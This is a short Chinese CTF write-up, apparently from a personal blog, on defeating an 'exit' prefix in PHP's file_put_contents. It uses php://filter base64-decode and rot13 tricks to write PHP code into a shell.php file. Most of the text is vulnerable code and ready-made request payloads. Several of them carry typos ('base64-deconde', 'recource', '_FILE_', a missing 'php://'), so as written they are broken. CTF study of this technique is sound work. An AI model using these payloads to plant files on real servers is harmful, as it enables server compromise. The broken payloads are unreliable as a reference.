file_put_content利用(php://filter协议)

CTF
Word count: 202   |   Reading time≈ 1 min
  1. 0×01
  2. 0×02

0×01

1
2
3
4
5
6
<?php
show_source(_FILE_);
chdir("sandbox");
$filename = $_REQUEST['file'];
$data  = '<?php exit(); ?'. $filename;
file_put_content($filename,$data);

exit加在filename前面,会导致写入的内容不能执行。(利用php base64_decode函数特性去除“死亡exit”)

Payload:

/?file=filter/write=convert.base64-deconde|aPD9waHAgcGhwaW5mbygpOz8+/recource=shell.php

/?file = php://filter/write=string.rot13|<?cuc cucvasb();?>/resource=shell.php rot13编码

0×02

1
2
3
4
<?php
$content = '<?php exit; ?>';
$content .= $_POST['txt'];
file_put_contents($_POST['filename'], $content);

base64可打印(A-Z a-z 0-9 +/)=补位 ,遇到不符合的字符会跳过,所以< ? ; ? >; 和空格 七个字符不符合,

最终解码只有phpexit7个字符,base64解码是4个一组的,所有要在shell前面加个a,

Payload:

/?txt=aPD9waHAgcGhwaW5mbygpOz8+&filename=php://filter/write=convert.base64-deconde/resource=shell.php //PD9waHAgcGhwaW5mbygpOz8+前面要多加一个a

参考博客:https://www.cnblogs.com/vege/p/12650702.html

0 comments
Anonymous
Error: Not Found.
Markdown is supported

Be the first person to leave a comment!

  • Copyrights © 2020-2023 Shmily-ing
  • Visitors:880 | Views:1270

请我喝杯咖啡吧~

支付宝
微信